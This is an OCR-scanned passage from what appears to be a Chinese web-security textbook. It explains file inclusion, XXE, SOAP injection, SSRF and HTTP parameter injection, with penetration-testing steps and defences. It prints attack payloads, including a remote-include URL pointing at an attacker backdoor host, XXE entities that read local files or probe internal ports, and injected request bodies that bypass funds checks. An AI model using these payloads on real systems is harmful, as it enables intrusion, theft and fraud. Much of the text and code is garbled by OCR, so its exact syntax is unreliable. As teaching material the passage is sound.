目的 。 如 果 这 个 方法 返回 的 字符 串 并 不 以 起 始 目录 的 名 称 开 头 ， 
那么 用 户 已 通过 某 种 方式 避 开 了 应 用 程序 的 输入 过 滤 ， 因 而 应 用 
程序 应 拒绝 执行 该 请 求 。 

在 ASP.NET 中 ， 可 以 将 用 户 提交 的 文件 名 传送 给 
System.Io.Path.GetFullPath 方 法 ， 并 对 返回 的 字符 串 执行 和 上 壕 
Java 中 一 样 的 检查 ， 从 而 达到 相同 的 目的 。 

应 用 程序 可 以 使 用 一 个 chrooted 环 境 访 问 包 含 被 访问 文件 的 目录 ， 
减轻 大 多 数 路 径 人 遍历 漏洞 造成 的 影响 。 在 这 种 情况 下 ，chrooted 目 录 就 
好 比 是 文件 系统 根 目 录 ， 任 何 试图 从 这 个 目录 同上 回 渭 的 多 余 侦 历 请 
求 都 被 忽略 。 大 多 数 UNIX 平 台 都 文 持 chrooted 文 件 系统 。 在 Windows 
平台 上 ， 以 新 逻辑 驱动 器 的 形式 安装 相关 起 始 目 孙 ， 并 且 使 用 相应 的 
目录 内 容 ， 即 可 实现 类 似 的 效果 (至 少 对 遍历 漏洞 而 
言 是 这 样 ) 。 

应 用 程序 应 将 其 路 径 思 历 攻 击 防 御 机 制 与 日 志和 警报 机 制 整合 在 
一 起 。 任 何 时 候 ， 只 要 收 到 一 个 包含 路 径 遇 历 序 列 的 请 求 ， 提 出 请 求 
的 用 户 束 可 能 心 存 恶 意 ， 应 用 程序 应 在 日 志 中 进行 记录 ， 标 明 该 请 求 
企图 违反 安全 机 制 ， 并 终止 该 用 户 的 会 话 。 如 有 可 能 ， 应 冻结 该 用 户 
账户 并 向 管理 员 发 出 警报 。 


10.2.2 ”文件 包含 漏洞 


许多 脚本 语言 支持 使 用 包含 文件 (include file) 。 这 种 功能 允许 开 
发 者 把 可 重复 使 用 的 代码 插入 到 单个 的 文件 中 ， 并 在 需要 时 将 它们 包 
含 在 特殊 功能 的 代码 文件 中 。 然 后 ， 包 含 文件 中 的 代码 被 解释 ， 就 好 
像 它 插入 到 包含 指令 的 位 置 一 样 。 

1. 远程 文件 包含 

PHP 语 言 特别 容易 出 现 文件 包含 漏洞 ， 因 为 它 的 包含 函数 接受 远 
程 文件 路 径 。 这 种 缺陷 已 经 成 为 PHP 应 用 程序 中 大 量 漏洞 的 根源 。 

以 一 个 回 不 同位 置 的 人 们 传送 各 种 内 容 的 应 用 程序 为 例 。 用 户 选 
择 他 们 的 位 置 后 ， 这 个 信息 通过 一 个 请 求 参数 传送 给 服务 器 ， 代 码 如 
下 : 


https://wahh-app.com/main.php?Country=US 
应 用 程序 通过 以 下 方式 处 理 Country 参 数 : 
Jantry = $_ GET "Country |]; 


include( Scountry . '.php' ); 


这 使 执行 环境 加 载 位 于 Web 服 务 占 文件 系统 中 的 US.php 文 件 。 然 
后 ， 这 个 文件 的 内 容 被 复制 到 main.php 文 件 中 ， 并 得 以 执行 。 

攻击 者 能 够 以 各 种 方式 利用 这 种 行为 ， 最 三 重 的 情况 是 指定 一 个 
外 部 URL 作 为 包含 文件 的 位 置 。PHP 包 含 画 数 接受 这 个 位 置 作为 输 
入 ， 拉 着， 执行 环境 将 获取 指定 的 文件 并 执行 其 内 容 。 因 此 ， 攻 击 者 
能 够 构建 一 个 包含 任意 复杂 内 容 的 恶意 脚本 ， 将 其 寄存 在 他 控制 的 
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n/main.php?Country=hctp: //wahh-attacker.com/backdcor 


https://wa 


2. 本 地 文件 包含 

有 时 ， 应 用 程序 根据 用 户 可 控制 的 数据 加 载 包 含 文件 ， 但 这 时 不 
可 能 给 位 于 外 部 服务 器 上 的 文件 指定 URL。 例 如 ， 如 果 用 户 可 控制 的 
数据 被 提交 给 ASP 函 数 Server.Execute， 那 么 攻击 者 束 可 以 执行 任意 一 
段 ASP 脚 本 ， 只 要 这 上 段 脚 本 属于 调用 这 个 芳 数 的 相同 应 用 程序 。 
人 
ae o 


口 在 服务 器 上 可 能 有 一 些 通过 正常 途径 无 法 访问 的 文件 ， 例 如 ， 
任何 访问 路 径 /admin 的 请 求 都 会 被 应 用 程序 实施 的 访问 控制 阻止 。 如 
era eee “laine 问 的 页 面 中 ， 那 么 就 可 以 访问 那 

六 功能 。 

口服 务 器 上 的 一 些 静 态 资 源 也 受到 同样 的 保护 ， 无 法 直接 访问 。 
如 果 能 够 将 这 些 文件 动态 包含 在 其 他 应 用 程序 页 面 中 ， 那 么 执行 环境 
就 会 将 静态 资源 的 内 容 复制 到 它 的 响应 中 。 

3. 查找 文件 包含 漏洞 

任何 用 户 提 交 的 数据 项 都 可 能 引起 文件 包含 漏洞 。 它 们 经 常 出 现 
在 指定 一 种 语言 或 一 个 位 置 的 请 求 参数 中 ， 也 常常 发 生 在 以 参数 形式 
传送 服务 器 端 文件 名 的 情况 下 。 


渗透 测试 步骤 

要 测试 远程 文件 包 合 漏 洞 ， 执 行 以 下 步骤 。 

(1) 向 每 一 个 目标 参数 提交 一 个 连接 受 控制 的 Web 服 务 器 资源 
的 URL， 并 确定 是 人 否 收 到 运行 目标 应 用 程序 的 服务 器 提出 的 任何 请 


求 
(2) 如 果 第 一 次 测试 失败 ， 演 试 提交 一 个 包含 不 存在 的 耳 地 址 


的 URL， 并 确定 服务 器 试图 与 这 个 地 址 建立 连接 时 是 否 出 现 超时 。 
(3) 如 果 发 现 应 用 程序 易于 受到 远程 文件 包含 攻击 ， 与 前 面 
描述 的 动态 执行 攻击 中 一 样 ， 使 用 相关 语言 中 可 用 的 API， 构 建 一 


段 亚 意 脚本 实施 攻击 。 

相对 于 远程 文件 包含 而 言 ， 存 在 本 地 文件 包含 漏洞 的 脚本 环境 
要 更 多 一 些 。 要 测试 本 地 文件 包含 调 筒 ， 执 行 以 下 步 又 。 

(1) 提交 服务 器 上 一 个 已 知 可 执行 资源 的 名 称 ， 确 定 应 用 程 
序 的 行为 是 否 有 任何 变化 。 

(2) 提交 服务 器 上 一 个 已 知 静 态 资源 的 名 称 ， 确 定 它 的 内 容 
征 否 被 复制 到 应 用 程序 的 啊 应 中 。 

(3) 如 果 应 用 程序 易于 受到 本 地 文件 包含 攻击 ， 党 试 通过 Web 
服务 器 访问 任何 无 法 直接 到 达 的 敏感 功能 或 资源 。 
" (4) 测试 能 否 利用 之 前 讲 到 的 侦 历 技巧 访问 其 他 目录 中 的 文 
件 。 


10.3 ”注入 XML MER 


今天 的 Web 应 用 程序 大 量 使 用 XML ， 在 浏览 器 与 前 端 应 用 程序 服 
务 需 之 间 传 送 的 请 求 和 啊 应 ， 以 及 在 后 端 应 用 程序 组 件 〈 如 SOAP 服 
务 ) 之 间 传 送 的 消息 中 都 可 以 找到 XML。 如 果 使 用 专门 设计 的 输入 破 
oe ae 这 些 位 置 束 易于 受到 各 种 
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10.3.1 ”注入 XML 外 部 实体 


在 今天 的 Web 应 用 程序 中 ，XML 常 用 于 从 客户 端 向 服务 器 提交 数 
据 。 然后， 服务 器 端 应 用 程序 将 处 理 这 些 数据 ， 并 且 可 能 会 返回 一 个 
包含 XMI 或 任何 其 他 格式 数据 的 响应 。 在 使 用 异步 请 求 在 后 台 进 行 通 
信 的 基于 Ajax 的 应 用 程序 中 ， 这 种 行为 最 为 常见 。 浏 览 器 扩展 组 件 和 
其 他 客户 端 技术 也 可 能 会 用 到 XML 。 

以 一 个 使 用 Ajax 实现 的 、 提 供 无 颖 用 户 体验 的 搜索 功能 为 例 。 在 
用 户 输入 搜索 词 时 ， 客 户 端 脚 本 将 向 服务 器 提出 以 下 请 求 


POST /search/128/AjaxSearch.ashx HTTP/1.1 


Eost: mdsec.net 
Content-Type: text/xml; charset=UTF-8 


Content-Length: 44 


<Search><SearchTerm>nothing will chancge</SearchTerm></Search> 


服务 器 的 响应 如 下 所 示 (无 论 响应 采用 什么 格式 ， 其 中 都 可 能 存 
在 漏洞 ， 


t Type xt /xml hars 8 
<Search><SearchkR results founa for expression: nothing will 
change</SearchResult></Search> 


FPERRA, FARRER H FT eT T° 
如 条 过 到 这 种 类 型 的 功能 ， 应 当 始 终 检查 其 是 否 存 在 XML 外 部 实 
体 (XXE) 注入 漏洞 。 之 所 以 会 出 现 这 种 漏洞 ， 是 因为 标准 的 XML 解 


析 库 文 持 使 用 实体 引用 。 这 些 引 用 仅仅 是 在 XML 文档 内 部 或 外 部 引用 
数据 的 一 种 方法 。 通 过 阅读 本 书 的 其 他 内 容 ， 你 应 该 很 熟悉 实体 引 
用 。 例 如 ， 与 < 和 > 字符 对 应 的 实体 如 下 所 示 : 


XML 格式 允许 在 XML 文档 中 定义 定制 实体 。 这 些 实体 在 文档 开始 
部 分 的 可 选 DOCTYPE 元 素 中 定义 。 例 如 : 


<!DOCTYPE foo [ <!ENTITY testref "“testrefvalue" > ]> 


如 果 文 档 中 包含 以 上 定义 ， 解 析 器 将 用 testrefvalue 这 个 已 定义 的 
值 蔡 代 文档 中 出 现 的 任何 &testref; 实 体 引 用 。 

此 外 ，XML 规 范 允 许 使 用 外 部 引用 来 定义 实体 ，XML 解 析 恬 将 动 
态 提取 这 些 实体 的 值 。 这 些 外 部 实体 定义 采用 URL 格 式 ， 并 可 以 引用 
外 部 Web URL 或 本 地 文件 系统 上 的 资源 。XML 人 解析 器 将 提取 指定 URL 
或 文件 的 内 容 ， 并 将 其 作为 已 定义 实体 的 值 。 如 果 应 用 程序 在 其 啊 应 
中 返回 任何 使 用 外 部 定义 的 实体 的 XML 数据 ， 则 指定 文件 或 URL 的 内 
容 将 在 该 响应 中 返回 。 

攻击 者 可 以 通过 向 XML 添 加 适当 的 DOCTYPE 元 素 ， 或 通过 修改 
该 元 素 (如 果 它 已 经 存在 ) ， 在 基于 XML 的 请 求 中 指定 外 部 实体 。 外 
部 实体 引用 使 用 SYSTEM 关 键 字 来 指定 ， 并 使 用 URL (可 能 使 用 file: 
协议 ) 进行 定义 。 

在 前 一 个 示例 中 ， 攻 击 者 可 以 提交 以 下 请 求 (该 请 求 定义 一 个 引 
用 服务 器 文件 系统 上 的 文件 的 XML 外 部 实体 ) : 


OST /search/128/AjaxSearch.ashx HTTP/1.1 


Host: masec.net 


Content-Type: text/xml; charsec-UTF-8 


<IDOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///wincows/win.ini*® > ]> 


内 容 来 替代 已 定义 的 实体 引用 (攻击 者 已 在 SearchTerm 元 素 中 使 用 了 
该 实体 引用 ) 。 由 于 SearchTerm 元 素 的 值 会 在 应 用 程序 的 响应 中 回 
显 ， 这 会 导 人 致 服务 器 以 该 文件 的 内 容 作 出 啊 应 ， 如 下 所 示 : 


HTTP/1.1 200 OK 
Content-Type: text/xml; charset=utf-8 
Content-Length: 556 


<Search><SearchResuit>No results found for expression: ; for 16-bit app 
support 

[onts] 

[extensions] 

{mci extensions] 

(files) 


尝试 访问 


http://mdsec.net/search/128/ 


除 使 用 file: 协 议 来 指定 本 地 文件 系统 上 的 资源 外 ， 攻 击 者 还 可 以 
使 用 http: 等 协议 让 服务 器 通过 网 络 提取 资源 。 这 些 URL 可 以 指定 任意 
主机 、IP 地 址 和 端口 。 攻 击 者 可 以 利用 它们 与 后 端 系 统 上 无 法 通过 因 
特 网 直接 访问 的 网 络 服务 进行 交互 。 例 如 ， 以 下 攻击 党 试 连接 到 在 专 
用 IP 地 址 192.168.1.1 的 端口 25 上 运行 的 邮件 服务 器 : 


<!DOCTYPE foo [ <! ENTITY xxe SYSTEM "http://192.168.1.1:25" > J> 


<Search><SearchTerm>&xxe; </SearchTerm></Search> 


通过 这 种 技巧 可 以 实施 各 种 攻击 ， 如 下 所 示 。 

口 攻 击 者 可 以 将 应 用 程序 作为 代理 服务 器 使 用 ， 从 应 用 程序 能 够 
访问 的 任何 Web 服 务 器 上 检索 敏感 内 容 ， 包 括 那 些 在 组 织 内 部 的 专用 
韭 路 由 地 址 空间 运行 的 内 容 。 

口 攻 击 考 可 以 利用 后 端 Web 应 用 程序 中 的 漏洞， 只 要 这 些 漏洞 可 
以 通过 URL 加 以 利用 。 

口 攻击 者 可 以 通过 攻击 大 量 IP 地 址 和 端口 号 ， 对 后 端 系 统 上 的 开 
放 端 口 进 行 测试 。 在 某 些 情况 下 ， 可 以 使 用 时 间 性 差异 来 推断 所 请 求 
的 端口 的 状态 。 其 他 时 候 ， 应 用 程序 可 能 会 在 啊 应 中 返回 某 些 服务 的 
服务 标题 (service banner) 。 

最 后 ， 如 果 应 用 程序 检索 外 部 实体 ， 但 并 不 在 响应 中 返回 该 实 
ee 以 通过 无 期 限 地 读 取 某 个 文件 流 ， 从 而 实施 拒绝 

务 攻 击 。 


<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " file:///dev/random"> ]> 


10.3.2 注入 SOAP 


SOAP (Simple Object Access Protocol， 简 单 对 象 访问 协议 ) 是 一 
种 使 用 XML 格式 封装 数据 、 基 于 消息 的 通信 技术 。 各 种 在 不 同 操作 系 
统 和 架构 上 运行 的 系统 也 使 用 它 来 共享 信息 和 传递 消息 。 它 主要 用 在 


Web 服 务 中 ; 通过 浏览 器 访问 的 Web 应 用 程序 常常 使 用 SOAP 在 后 端 应 
用 程序 组 件 之 间 进 行 通信 。 

由 不 同 计算 机 执行 单项 任务 以 提高 性 能 的 大 型 企业 应 用 程序 经 常 
使 用 SOAP。 采 用 Web 应 用 程序 作为 现 有 应 用 程序 前 端的 情况 也 经 常 可 
以 见 到 SOAP 的 身影 。 这 时 ， 应 用 程序 通 音 使 用 SOAP 在 不 同 的 组 件 之 
间 通 信 ， 以 确保 模块 性 和 互 用 性 。 

由 于 XML 是 一 种 解释 型 语言 ， 因 此 ， 和 前 面 描述 的 其 他 示例 一 
样 ，SOAP 也 易于 受到 代码 注入 攻击 。XML 元 素 通 过 元 字符 <、> 和 /以 
语法 形式 表示 。 如 果 用 户 提 交 的 数据 中 包含 这 些 子 符 ， 并 被 直接 插入 
SOAP 消 恩 中 ， 攻 击 者 下 能 够 破坏 消 居 的 结构 ， 进 而 破坏 应 用 程序 的 
逻辑 或 造成 其 他 不 利 影响 。 
si per pees eee ， 一 名 用 户 正 使 用 下 面 的 HTTP 请 求 进行 

账 : 


POST /bank/27/Default.aspx HTTP/1.0 


FromAccount=18281008sAmount=1463 0& ToAccount=08447656&Submit=Submit 


在 处 理 这 个 请 求 的 过 程 中 ， 应 用 程序 在 两 个 后 端 组 件 之 间 传 送 下 
面 的 SOAP 消 息 : 


<soap: Envelope xmlns:soap="http: //www.w3.ordg/2091/12/soap-envelope"> 
<soap: Body> 
<pre:Add xmlns:pre=http://target/lists soap: encodingStyle= 
“http: //www.w3.org/2001/12/soap-encoding"> 
<Account> 
<FromAccount>18281008</PFromAccount> 
<Amount> 1430</Amount> 
<ClearedPunds>False</ClearedPunds> 
<ToAccount>08447656</ToAcccunt> 
</Account> 
</pre:Add> 
</soap: Body> 


</soap: Envelone> 


注意 消息 中 的 XML 元 素 如 何 与 HITP 请 求 中 的 参数 对 应 起 来 ， 以 
及 应 用 程序 如 何 添加 ClearedFunds 元 素 。 这 时 ， 应 用 程序 逻辑 确定 账 
户 中 没有 足够 的 资金 可 进行 转账 ， 并 将 这 个 元 素 (ClearedFunds) 的 
值 设 为 False， 因 此 收 到 SOAP 消 乱 的 组 件 将 拒绝 转账 。 


在 这 种 情况 下 ， 攻 击 者 可 以 通过 各 种 方法 注入 SOAP 消 息 ， 从 而 
破坏 应 用 程序 的 逻辑 。 例 如 ， 提 交 下 面 的 请 求 会 在 最 初 的 元 素 之 前 插 
入 另外 一 个 ClearedFunds 元 素 (同时 保持 SQL 语 法 的 有 效 性 ) 。 如 果 应 
用 程序 处 理 它 遇 到 的 第 一 个 ClearedFunds 元 素 ， 那 么 即使 账户 中 没有 
资金 ， 也 可 以 成 功 进行 转账 。 


POST /bank/27/Default.aspx HTTP/1.0 

Host: mdsec.net 

Content-Length: 119 
FromAccount=18281C08sAmount=1430</Amount><ClearedFunds>True 


</ClearedPunds><Amount>143 0&ToAccount=-08447656&Submit-Submit 


另 一 方面 ， 如 果 应 用 程序 处 理 它 遇 到 的 后 一 个 ClearedFunds 元 
素 ， 攻 击 者 就 可 以 在 ToAccount 参 数 中 注入 一 个 类 似 的 攻击 。 

男 一 种 类 型 的 攻击 是 使 用 XML 注 释 完 全 删除 原始 SOAP 消 恩 中 的 
一 个 元 素 ， 并 用 攻击 者 目 己 设计 的 元 素 代 替 被 删除 的 元 素 。 例 如 ， 下 
面 的 请 求 通过 Amount 参 数 注 入 一 个 ClearedFunds 元 素 ， 为 ToAccount 元 
素 建 立 一 个 起 始 标签 ， 开 始 一 段 注 释 ， 并 在 ToAccount 参 数 中 结束 注 
释 ， 从 而 保持 XML 语法 的 有 效 性 : 


POST /bank/27/Default.aspx HTTP/1.0 
Host: mdsec.net 
Content-Length: 125 


FromAccount=18281008séAmount=1430</Amount><ClearedFunds>True 
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配 ， 这 种 攻击 会 生成 完全 错误 的 XML 语法 ， 从 而 被 许多 XML 解析 器 拒 
绝 。 这 种 攻击 并 不 能 在 所 有 XML 解析 库 中 起 作用 ， 它 只 对 定制 或 目 主 
PACH XMLAP HT ase ° 


POST /bank/27/Default.aspx BTTP/1.0 
Host: mdsec.net 
Content-Length: 176 


FromAccount=18281008&Amount=1430</Amount><Clearedfunds>True 
</ClearedFunds> 
<ToAccount>08447656</ToAccount></Account></pre:Add></soap: Body> 
</soap: Envelope> 

<!--&Submit=Submit 


尝试 访问 


这 个 示例 中 包含 一 个 错误 消息 ， 有 助 于 对 攻击 进行 微调 


http://mdsec.net/bank/27/ 

下 面 的 示例 包含 同样 的 漏洞 ， 但 反馈 信息 很 少 。 由 此 可 见 ， 如 
采 错 误 消 息 没 有 什么 提示 信息 ， 利 用 SOAP 注 入 有 多 难 ! 

http://mdsec.net/bank/18/ 

http://mdsec.net/bank/6/ 


10.3.3 ”查找 并 利用 SOAP 注 入 


SOAP 注 入 可 能 很 难 发 现 ， 因 为 随意 提交 XML 元 字符 会 破坏 SOAP 
消息 的 格式 ， 而 且 这 样 做 生成 的 错误 消息 也 极其 简单 。 但 是 ， 使 用 下 
面 的 步骤 依然 可 以 相对 可 靠 地 检测 出 SOAP 广 入 漏洞 。 


渗透 测试 步骤 


(1) 轮流 在 每 个 参数 中 提交 一 个 恶意 XML 结束 标签 ， 如 
</foo>。 如 果 没 有 发 生 错误 ， 那 么 输入 可 能 没有 插入 到 SOAP 消 奶 
中 ， 或 者 以 某 种 方式 被 净化 了 。 

(2) 如 果 出 现 错误 ， 提 交 一 对 有 效 的 起 始 与 结束 标签 ， 如 
Sanam 。 如 采 这 对 标签 使 错误 消失 ， 那 么 应 用 程序 很 可 能 易于 
受到 攻击 。 

(3) 有 些 时 候 ， 插 入 到 XML 格式 消息 中 的 数据 随后 以 XML 格 
式 锌 读 取 并 返回 给 用 户 。 如 有 果 修 改 的 数据 项 在 应 用 程序 的 啊 应 中 返 


回 ， 看 看 提交 任意 XML 内 容 是 否 会 以 相同 的 形式 返回 ， 或 者 已 通过 
某 种 方式 被 规范 化 。 轮 流 提交 下 面 两 个 值 ; 


test<foo/> 
test<foo></foo> 


如 果 发 现 其 中 一 个 值 的 返回 结果 为 另 一 个 值 ， 或 者 只 返回 test， 
那么 可 以 确信 输入 被 插入 到 了 XML 消息 中 。 

(4) 如果 HTTP 请 求 中 包含 几 个 可 放 入 SOAP 消 息 的 参数 ， 尝 
试 在 一 个 参数 中 插入 起 始 注释 字符 <!--， 在 另 一 个 参数 中 插入 结束 
注释 字符 !-->。 然 后 ， 轮 换 在 参数 中 揪 入 这 两 个 字符 (因为 无 法 知 
道 参数 出 现 的 顺序 ) 。 这 样 做 可 能 会 把 服务 器 SOAP 消 息 的 某 个 兰 
分 作为 注释 处 理 ， 从 而 改变 应 用 程序 的 逻辑 ， 或 者 形成 一 个 可 能 造 
成 信息 泄露 的 不 同 错误 条 件 。 


如 果 SOAP 注 入 很 难 发 现 ， 束 更 难 对 其 加 以 利用 。 许 多 时 候 ， 需 
要 知道 数据 周围 的 XML 的 结构 ， 以 提交 专门 设计 的 输入 ， 修 改 消 妃 内 
容 而 不 致 玻 坏 它 的 结构 。 在 前 面 描述 的 所 有 测试 中 寻找 任何 揭示 
SOAP 消 忌 处 理 细 亨 的 错误 消息 。 洱 运 的 话 ， 一 条 详细 的 错误 消 筷 将 
透露 SOAP 消 息 的 完整 内 容 ， 人 允许 构建 专门 设计 的 值得 找 相关 漏洞 。 
如 采 不 够 幸运 ， 吏 只 能 纯粹 猜测 ， 这 样 攻击 成 功 的 几率 吏 非 常 低 。 


10.3.4 ”防止 SOAP 注 入 


我 们 可 以 在 用 户 提交 的 数据 被 插入 SOAP 消 居中 的 任何 位 置 实施 
边界 确认 过 滤 ， 以 防止 SOAP 注 入 。 和 需要 进行 过 滤 的 数据 包括 用 户 在 
当前 请 求 中 直接 提交 的 数据 ， 以 及 在 前 面 的 请 求 中 已 经 存在 或 由 以 用 
户 数据 为 输入 的 其 他 处 理 过 程 生成 的 数据 。 

为 防止 上 述 攻 击 ， 应 用 程序 应 对 出 现在 用 户 输入 中 的 任何 XML 元 
字符 进行 HTML 编 码 。HTML 编 码 包 含 用 对 应 的 HTML 实 体 蔡 代 字 面 量 
字符 。 这 样 做 可 确保 XML 人 解释 絮 在 进行 处 理 时 ， 把 它们 当做 相关 元 于 
的 数据 值 ， 而 不 是 消息 结构 的 一 部 分 。 一 些 经 常 造 成 问题 的 字符 的 
HTML 编 码 如 下 : 


O<—sit; 


10.4 ”注入 后 端 HTTP 请 求 


在 上 一 节 中 ， 我 们 介绍 了 一 些 应 用 程序 如 何 将 用 户 提 交 的 数据 合 
并 到 后 端 HTTP 请 求 中 ， 以 请 求 用 户 无 法 直接 访问 的 服务 。 更 常见 的 情 
况 是 ， 应 用 程序 可 能 会 将 用 户 输入 舱 入 任何 类 型 的 后 端 HTTP 请 求 ， 包 
括 那 些 以 常规 名 / 值 对 传输 参数 的 请 求 。 由 于 应 用 程序 通常 会 有 效 代理 
用 户 提 交 的 URL 或 参数 ， 因 而 这 种 行为 往往 易于 受到 攻击 。 针 对 这 种 
功能 的 攻击 可 以 分 为 以 下 类 别 : 

口服 务 器 端 HTTP 重 定向 : 攻击 者 可 以 通过 这 种 方法 指定 任意 资 
源 或 URL， 然 后 再 由 后 端 应 用 程序 服务 器 请 求 这 些 资源 或 URL。 

OHTTPHSVEA (HPI) : 攻击 者 可 以 通过 这 种 方法 在 应 用 程序 
服务 器 提出 的 后 端 HTTP 请 求 中 注入 任意 参数 。 如 果 攻 击 者 注入 后 端 请 
求 中 已 存在 的 参数 ， 就 可 以 利用 HTTP 参 数 污 染 (HPP) 攻击 覆盖 服务 


磺 指 定 的 原始 参数 值 。 


如 果 应 用 程序 接受 用 户 可 控制 的 输入 ， 并 将 其 合并 到 使 用 后 端 
HTTP 请 求 检 索 的 URL 中 ， 这 种 行为 就 会 导致 服 务 器 问 重 定 癌 漏洞 。 用 
户 提 交 的 输入 中 可 能 包含 被 检索 的 完整 URL， 或 者 应 用 程序 可 能 会 对 
该 URL 进 行 某 种 处 理 ， 如 添加 标准 的 后 级。 

后 端 HTTP 请 求 可 能 指定 公共 因特网 上 的 某 个 域 ， 或 者 指定 用 户 无 
法 直接 访问 的 内 部 服务 器 。 所 请 求 的 内 容 可 能 对 应 用 程序 的 功能 非常 
关键 ， 如 文 付 网 天 的 接口 ;或 者 较为 次 要 ， 如 从 第 三 方 提 取 的 内 容 。 
这 种 技巧 常用 于 将 几 个 单独 的 内 部 和 外 部 应 用 程序 组 件 结合 到 一 个 前 
端 应 用 程序 中 ， 再 由 该 应 用 程序 代表 这 些 组 件 实施 访问 控制 和 会 话 管 
理 。 如 果 攻 击 者 能 够 控制 后 端 HTTP 请 求 中 的 IP 地 址 或 主机 名 ， 他 就 可 
ee 

以 下 面 的 前 端 请 求 为 例 ， 其 中 的 loc 参 数 用 于 指定 客户 端 希望 查看 
的 CSS 文 件 的 版 本 : 


POST /account/home HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 
Host: wahh-blogs.net 

Content-Length: 65 


view-default&loc=online.wahh-blogs.net/css/wahh.css 


如 果 没 有 在 loc 参 数 中 为 URL 指 定 确 认 机 制 ， 攻 击 者 就 可 以 指定 任 
何 主机 名 来 蔡 代 online.wahh-blogs.net。 应 用 程序 将 检索 指定 的 资源 ， 
导致 攻击 者 将 应 用 程序 用 作 潜 在 的 敏感 后 端 服务 的 代理 服务 器 。 在 下 
面 的 示例 中 ， 攻 击 者 使 应 用 程序 连接 到 后 端 SSH 服 务 : 


POST /account/home HTTP/1.1 
Content-Type: application/x-www-form-urlencoded 


Host: blogs.mdsec.net 
Content-Length: 65 


view=default&loc=192.168.0.1:22 
应 用 程序 的 响应 包含 所 请 求 的 SSH 服 务 的 旗 标 : 


HTTP/1.1 200 OK 
Connection: close 


SSH-2.0-OpenSSH_4.2Protocol mismatch. 
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序 作 为 开放 的 HTTP 代 理 服务 器 ， 以 实施 各 种 其 他 攻击 。 

口 攻击 者 可 以 将 该 代理 服务 器 用 于 攻击 互联 网 上 的 第 三 方 系统 。 
恶意 流量 针对 的 是 运行 易 受 攻击 的 应 用 程序 的 服务 右上 的 目标 。 

口 攻击 者 可 以 将 该 代理 服务 厦 用 于 连接 到 组 织 内 部 网 络 中 的 任意 
主机 ， 从 而 访问 无 法 通过 因特网 直接 访问 的 目标 。 

口 攻击 者 可 以 将 该 代理 服务 套用 于 反 回 连接 在 应 用 程序 服务 做 本 
从 而 突破 防火 墙 的 限制 ， 并 利用 信任 关系 来 避 
开 身 份 验证 。 


口 最 后 ， 攻 击 者 可 以 通过 使 应 用 程序 在 啊 应 中 包含 受 控 的 内 容 ， 
ee (请 参阅 第 12 章 了 解 详 细 信 


JON 


渗透 测试 步骤 


(1) 确定 任何 可 能 包含 主机 名 、 卫 地 址 或 完整 UREL 的 请 求 参 
数 。 


(2) 对 于 每 个 参数 ， 修 改 参 数值 以 指定 其 他 与 所 请 求 的 资源 
类 似 的 资源 ， 并 观察 该 资源 是 否 会 出 现在 服务 絮 的 啊 应 中 。 
(3) 尝试 指定 一 个 针对 你 控制 的 因特网 服务 器 的 URL， 并 对 
该 服务 器 进行 监视 ， 检 查 来 目 所 测试 的 应 用 程序 的 传 入 连接 。 
(4) 如 果 没 有 收 到 任何 传 入 连接 ， 则 监视 应 用 程序 响应 所 花 
费 的 时 间 。 如 采 存 在 延迟 ， 则 说 明 应 用 程序 的 后 端 请 求 可 能 由 于 出 
站 连接 上 的 网 络 限制 导致 超时 。 
(5) 如 果 你 成 功利 用 相关 功能 连接 到 任意 URL， 则 可 以 尝试 
实施 以 下 攻击 。 
(a) 确定 是 否 可 以 指定 端口 号 。 例 如 ， 可 以 指定 
http://mdattacker.net:22 ° 
b) WRAL Remo Ss, Sie A Burp Intruder LA 
对 内 部 网 络 进行 问 口 扫描 ， 以 逐个 连接 到 一 系列 卫 地 址 和 端口 
(请 参阅 第 14 章 了 解 详细 信息 ) 。 
(c) 尝试 连接 到 应 用 程序 服务 器 的 回环 地 址 上 的 其 他 服 


(d) 挟 试 将 受 控 的 Web 页 面 加 载 到 应 用 程序 的 啊 应 中 ， 以 
实施 路 站 点 脚本 攻击 。 


务 。 


T 注解 一 些 服务 器 端 重 定向 API， 如 ASPNET 中 的 


S () 和 Server.Execute () ， 仅 可 重 定向 到 同一 主机 上 
的 相关 URL。 尽管 如 此 ， 攻 击 者 仍然 可 以 同 这 些 方法 传递 用 户 提 交 
的 输入 ， 以 利用 信任 关系 ， 并 访问 受 平台 级 喘 份 验证 保护 的 服务 履 
上 的 资源 。 


尝试 访问 


http://mdsec.net/updates/97/ 
http://mdsec.net/updates/99/ 


10.4.2 “HTTP 参数 注入 


如 果 用 户 提 交 的 参数 被 用 作 后 端 HTTP 请 求 中 的 参数 ， 这 时 就 会 导 
致 HITP 参 数 注 入 (HPI) 。 以 下 面 的 之 前 易于 受 SOAP 注 入 的 银行 转 
账 功能 ( 稍 作 修 改 ) 为 例 : 


POST /bank/48/Default.aspx HTTP/1.0 

Host: mdsec t 

Content-Lengt 65 
FromAccount-18281008sAmount=-1430&ToAccount-08447656&Submit-Submit 


ik PS aia OE Fe ita ae, RE SC FA BE DE 
架构 中 的 男 一 台 Web 服 务 器 提出 其 他 HTTP 请 求 。 在 以 下 后 端 请 求 中 ， 
应 用 程序 从 前 端 请 求 中 复制 了 一 些 参数 值 : 
POST /doTransfer.asp HTTP/1.0 
Host: mdsec-mgr.int.mdsec.net 
Content-Length: 44 
fromacc=18281008&amount=143 0&toacc=08447656 
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在 请 算 资 金 ， 从 而 避 开 上 述 检查 : 


clearedfunds=true 


如 果 攻 击 者 发 现 这 种 行为 ， 他 就 可 以 笑 试 实施 HPI 攻 击 ， 在 后 端 
请 求 中 注入 clearedfunds 参 数 。 要 注入 该 参数 ， 他 将 所 需 参 数 附加 到 现 


有 参数 值 的 后 面 ， 并 将 分 隔 名 称 和 值 的 & 和 = 字符 进行 URL 编 码 ， 如 下 
所 示 : 


POST /bank/48/Default.aspx HTTP/1.0 
Host: mdsec.net 


Content-Length: 96 


FromAccount=182810084&Amount=1430EToAccount=08447656%26cleareaiundst3atru 


e&Submit=Submit 


当 应 用 程序 服务 器 处 理 这 个 请 求 时 ， 它 会 以 正常 方式 对 参数 值 进 
行 URL 人 解码 。 因 此 ， 前 端 应 用 程序 收 到 的 ToAccount 参 数 的 值 为 : 


08447656&clearedfunds=true 
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求 ， 应 用 程序 将 提出 以 下 后 并 请 求 ， 使 攻击 者 能 够 成 功 避 开 清 算 资 金 


QA 
POST /doTransfer.asp HTTP/1.0 
Host: mdsec-mgr.int.mdsec.net 


Content-Length: 62 


fromacc=18281008ésamount=1430ktoacc=08447656éclearecdfunds=true 


尝试 访问 


